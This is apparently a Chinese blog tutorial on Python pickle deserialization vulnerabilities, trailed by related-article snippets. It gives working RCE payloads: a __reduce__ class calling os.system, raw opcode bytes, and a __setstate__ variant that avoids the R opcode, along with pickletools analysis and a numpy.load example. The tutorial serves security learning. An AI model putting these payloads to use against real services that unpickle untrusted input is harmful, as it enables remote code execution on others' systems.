python pickle漏洞

最新推荐文章于 2025-02-01 12:23:46 发布
原创 最新推荐文章于 2025-02-01 12:23:46 发布 · 746 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #安全 #反汇编

本文深入探讨了Python的pickle库在序列化和反序列化过程中可能存在的安全漏洞,特别是如何利用魔术方法如`__reduce__`进行远程命令执行(RCE)。还介绍了PVM(Python Virtual Machine)的工作原理,以及如何通过pickletools进行字节码反汇编分析。最后,文章提到了numpy.load可能导致的反序列化漏洞情况。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

python反序列化漏洞

1.使用pickle库对对象进行序列化和反序列化操作

json反序列化

import json

dict={"admin":"123"}
json_info = json.dumps(dict)
print(str(type(json_info))+json_info)
dict1=json.loads(json_info)
print(str(type(dict1)))
print(dict)

pickle反序列化

import pickle

class Test:
    name="admin"
    passwd="123"

test=Test()
print(pickle.dumps(test))
#b'\x80\x03c__main__\nTest\nq\x00)\x81q\x01.'
byte = b'\x80\x03c__main__\nTest\nq\x00)\x81q\x01.'
print(pickle.loads(byte))

运行上面的代码可以发现,json是将字典对象转化为字符串,pickle序列化则是将对象转化为字节流形式,而我们之前使用的php则是将对象转化为字符串。同时,json是不能操作字典以外的其他对象的。

2.魔术方法

详见https://docs.python.org/zh-cn/3/library/pickle.html

我们通常使用的__reduce__方法是高级接口,使用更低级的接口也可以实现命令执行

import os, pickle

class Test(object):
    def __reduce__(self):
        return (os.system,('ipconfig',))
    
print(pickle.dumps(Test(), protocol=0))
print(pickle.loads(b'cnt\nsystem\np0\n(Vipconfig\np1\ntp2\nRp3\n.'))

在这里插入图片描述

也就是说,只要pickle.loads的变量可控,就有反序列化漏洞

同时,如果我们更换魔术方法名称为setstate或getstate等,都可以产生相同的效果

3.PVM

程序被编译成字节码之后,就会被加载到通常被称为虚拟机的一个东西上(Virtual Machine)来执行,Python的虚拟机称为PVM(Python Virtual Machine).事实上,PVM就是迭代运行(类似for循环)字节码指令,然后操作系统会去执行这些命令.PVM是Python的运行引擎,它时常表现为Python系统的一部分,并且它是实际运行脚本的组件.

PVM 由三部分组成:

  • 指令处理器

    从流中读取 opcode 和参数,并对其进行解释处理。重复这个动作,直到遇到 . 这个结束符后停止。

    最终留在栈顶的值将被作为反序列化对象返回。

  • stack

    由 Python 的 list 实现,被用来临时存储数据、参数以及对象。

  • memo

    由 Python 的 dict 实现,为 PVM 的整个生命周期提供存储

4.pickletools

可以通过pickletools对序列化生成的字节码进行反汇编操作,反汇编的结果就是PVM上的字节码指令

有关pickletools:https://docs.python.org/zh-cn/3/library/pickletools.html

在这里插入图片描述

这就是以上代码反汇编的结果

以下分析指令执行过程

​ 字符串的第一个字节是\x80(这个操作符于版本2被加入)。机器看到这个操作符,立刻再去字符串读取一个字节,得到x03。解释为“这是一个依据3号协议序列化的字符串”,这个操作结束。

​ 机器取出下一个字符作为操作符C。这个操作符(称为GLOBAL操作符),它连续读取两个字符串,规定以\n为分割,并将这些字符串依次进栈,这里取的是nt和system。

​ 接下来,会遇到p指令,将栈顶存储在备忘录中;索引是字符串arg,同时遇到0指令,进行出栈操作

​ 由于,这里需要传参,所以会有R指令,在堆栈上对argtuple应用可调用

​ 接下来就结束这个字节码

5.不使用reduce进行rce
import os, pickle,pickletools

class Student():
    def __init__(self):
        self.name='123'
        self.grade='123'
        
pickletools.dis(b'\x80\x03c__main__\nStudent\n)\x81}(V__setstate__\ncos\nsystem\nubVipconfig\nb.')
pickle.loads(b'\x80\x03c__main__\nStudent\n)\x81}(V__setstate__\ncos\nsystem\nubVipconfig\nb.')

在这里插入图片描述

成功执行了命令,同时字节流中没有R指令码了

6.numpy.load触发反序列化漏洞

例如:numpy.load()先尝试以numpy自己的数据格式导入;如果失败,则尝试以pickle的格式导入。因此numpy.load()也可以触发pickle反序列化漏洞

格式导入;如果失败,则尝试以pickle的格式导入。因此numpy.load()也可以触发pickle反序列化漏洞

一睡12点
关注
Python Pickle反序列化漏洞
Lemon's blog
11-15 4883
前言: 刷题的时候做了一道[CISCN2019]ikun的题目,提示考察的知识点是Python Pickle,之前接触的都是有关PHP反序列化,这次就来好好学习一下Python Pickle反序列化漏洞。 基础知识 0x00:Pickle库及函数 picklepython语言的一个标准模块,实现了基本的数据序列化和反序列化pickle模块是以二进制的形式序列化后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列化为bytes对象
详解python pickle中的反序列化漏洞
公众号:该用户快成仙了
06-24 1493
反序列化过程有漏洞:如果我们反序列化了一个不可信的数据源,那就可能引发反序列化攻击。攻击者可以在序列化的数据里嵌入恶意代码,当你反序列化这个数据时,这些恶意代码就会被执行,可能会导致数据泄露、系统崩溃,甚至让攻击者远程控制你的系统。Pickle模块是Python自带的,它主要用来序列化和反序列化Python对象。你可以用Pickle把任何Python对象(包括复杂的数据结构)保存成字节流,然后在需要的时候再加载回来。Pickle的工作原理Pickle的工作原理其实很简单。
【WEB安全】不安全反序列化
weixin_43025534的博客
05-23 1653
序列化和反序列化是指用于将对象或数据结构转换为字节流的过程,以便在不同系统之间进行传输或存储,并在需要时重新构造。**序列化是指将对象或数据结构转换为字节流的过程。**在序列化过程中,对象的状态和数据被转换为一系列字节,这些字节可以按照一定的协议进行传输或存储。序列化通常用于将对象存储到磁盘或通过网络发送到其他系统。序列化后的字节流可以被保存下来,以后可以通过反序列化操作重新构建对象并恢复其状态和数据。**反序列化是指将序列化后的字节流转换回对象或数据结构的过程。
python pickle反序列化漏洞
weixin_43610673的博客
05-20 3622
前置知识 什么是pickle picklePython专用的一个进行序列化和反序列化的工具包,pickle能表示Python几乎所有的类型(包括自定义类型),由一系列opcode组成,模拟了类似堆栈的内存。 与PHP序列化或者JSON,这些以键值对形式存储序列化对象数据的不同,pickle 序列化(Python独有)是将一个 Python 对象及其所拥有的层次结构变成可以持久化储存的二进制数据,无法像JSON 一样直观阅读。在Python中,采用术语 封存 (pickling)和 解封 (unpickli
[python]pickle反序列化漏洞(未完结)
山可行,海可平
03-29 5596
基础知识 实现:pickle或cpickle,二者仅实现语言不同(前纯python,后C),而cPickle性能更好 pickle库 标注库,实现了数据序列化和反序列化 pickle模块是以二进制的形式序列化后保存到文件(后缀:.pkl),不能直接打开 序列化后字符串的表意、序列化的规则->PVM(python序列化和反序列化过程最根本的) PVM 解释字节码的解释引擎 执行流程 PVM将源码编译成字节码 python将编译好的字节码转发到PVM(python虚拟机),PVM循环迭代执行字节码指令
PythonPickle/PyTorch反序列化漏洞
兴趣使然的创作者
02-28 1637
一个漏洞
Python Pickle 反序列化漏洞
qq_46001025的博客
10-05 452
需要注意的一点:注意:对于我们自己定义的class,如果直接以 data=‘aaa’ 的方式赋初值,则这个date不会被打包,解决方案是写一个__init__()方法。python反序列化漏洞的产生和php的魔术方法有异曲同工之处,在Python2中的 __reduce__() 方法,会在每次的反序列化开始或结束时调用。字节码,如果python有写入的权限,那么会生成一个 .pyc 的字节码文件,若没有那就再内存中生成字节码,程序结束后丢弃。(以下称为机器吧)维护了两个东西:栈区和存储区。
Python pickle,网络数据传输就得这么玩
xyh2004的博客
06-12 905
pickle模块提供了多个序列化协议版本,不同版本之间在兼容性、性能以及安全性方面有所差异。了解并合理选择适合的protocol参数对于数据序列化至关重要。•Protocol 0:这是默认的文本协议,可读性强但效率较低。它在所有Python版本中都可用,是向后兼容的选择。•Protocol 1:这是一个二进制协议,比Protocol 0稍快一些,但在Python 3中已被弃用,不推荐使用。
Python-Pickle-RCE-Exploit:具有易受攻击的Flask App的简单RCE PoC
03-17
Python-Pickle-RCE-漏洞利用 具有易受攻击的Flask应用程序的简单RCE Pickle PoC 在Python中,pickle模块可让您序列化和反序列化数据。 从本质上讲,这意味着您可以将Python对象转换为字节流,然后稍后在其他进程或...
Python pickle模块实现对象序列化
09-18
pickle模块的数据结构在反序列化时会执行其中的代码,这可能导致安全漏洞。因此,不应该从不可信的源加载 pickle 文件。另外,使用较旧的 pickle 协议版本可能会有兼容性问题,不同版本的Python可能会有不同的pickle...
python反序列化漏洞 任意代码执行
01-20
上一篇博客中我介绍了python的字符串,元组,列表和字典的序列化 详细请看: python序列化中的字符串,列表,字典,类的序列化解释 这篇博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化中运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实现任意代码执行 举个例子: import pickle import os class Student(object): name = 'yuaneuro' age = '20' def __reduce__(self):
Python pickle 中的 POP 指令码
Python_xiaowu的博客
01-15 977
事情起源于笔者 2019 年的一篇文章: 从零开始python反序列化攻击:pickle原理解析 & 不用reduce的RCE姿势 前言 不经意间就起了这么长一个题目。昨晚用了4h左右的时间看皮ckle源码(主要是_Unpickler部分),发掘出了几种新的漏洞利用方式,目前网上暂未见资料,因此我们决定写一篇文章分享一下。本文详细介绍了pyckle.l... 正在上传…重新上传取消​知乎专栏阮行止上海洛谷网络科技有限公司 讲师 文中提到,注入恶意对象引发 RCE 之后,常常由于返..
Python Pickle任意代码执行漏洞
coordinate的博客
02-28 1538
我们通常使用picklepython对象序列化,但是pickle在加载时有一个副作用就是它会自动加载相应模块并构造实例对象。这样就造成了一个很危险的代码,如果被黑客利用的话会造成非常严重的后果。 我首先在python2.7下测试,通过如下代码生成payload import pickle import os class gen(object): def __reduce__(se...
python pickle反序列化漏洞_Python Pickle反序列化漏洞
weixin_39635432的博客
12-08 341
Python序列化与反序列化Python 的序列化和反序列化是将一个类对象向字节流转化从而进行存储和传输,然后使用的时候再将字节流转化回原始的对象的一个过程几个重要函数Pickle.dump():将Python对象序列化保存到本地的文件中。Pickle.load():载入本地文件,将文件内容反序列化Python对象。Pickle.dumps():将Python对象序列化为字符串。Pickle.l...
pickle反序列化漏洞基础知识与绕过简析
yj520400的博客
03-25 1535
的结合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象).其中两个dump函数是把python对象转换为二进制对象的,两个load函数是把二进制对象转换为python对象的.在Python中,面向对象的思想和php是一致的,只是定义类的代码,调用类函数和类属性的方式和php不同.方法且该方法返回一个迭代器对象,那么这个对象就被认为是可迭代的。语言.也就是说在Python中几乎一切皆为对象.这也为我们的绕过提供的不小的便利.
Pythonpickle反序列化漏洞
Elite的博客
09-17 1504
picklePython 的序列化模块,用于将 Python 对象转换为字节流,以便于存储或传输。反序列化是将字节流还原为对象的过程。然而,pickle 反序列化操作的不安全性在于,它可以执行在字节流中包含的任意代码,而不加以验证和限制。
python安全Pickle反序列化漏洞学习。
Mrs_H的博客
10-28 2560
前言 写这篇文章的起因是两次遇到python pickle的题目都只做到了命令执行的程度,但都没有反弹shell。看别人的wp都是通过curl将flag拉到vps上的,怎么说呢,死于没有公网IP。虽然之前在做题的时候,照着网上的exp可以把自己的payload改个七七八八,但是说实话我距离真正意义上的“手撸”opcode还是有着一段距离。这篇文章主要还是通过我所遇到的pickle反序列化题目出发进行编写,当然也少不了pickle的原理部分。 正文 在正式开始这篇文章之前,我想先贴出一位大佬的文章Pion1e
Python pickle反序列化漏洞
最新发布
2301_80467400的博客
02-01 1988
这样当该序列化后的对象反序列化时,pickle.loads就会调用其中的__reduce__(),得到执行后的结果,形成任意代码执行漏洞。得到的是一个使用了tornado框架的python web项目,作为新手我搜了下该项目中这个框架大概就是各个py文件处理服务器初始化、数据库、url路由等等,然后模板文件夹里面放了各个页面的html,由那些py文件中处理好的数据渲染这些模板html。,并改变username为admin,得到账号为admin的JWT,再将该JWT填入截到的包里面,成功进入admin页面。
pickle 反序列化漏洞浅析
Derait的博客
08-07 1284
pickle 反序列化漏洞浅析 Pickle库及函数 picklepython语言的一个标准模块,实现了基本的数据序列化和反序列化pickle模块是以二进制的形式序列化后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列化为bytes对象 dump 对象反序列化到文件对象,存入文件 loads 从bytes对象反序列化 load 对象反序列化,从文件中读取数据 先通过几个例子来看下这几个函数的作用: dump/load
Python pickle模块序列化与反序列化实战教程
标签“python pickle模块”表明这个压缩包文件将聚焦于Python编程语言中的pickle模块,这是Python的一个内置库,不需要安装额外的包就可以直接使用。 压缩包的文件名称列表只有一个条目:“面向对象案例”,这表明...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值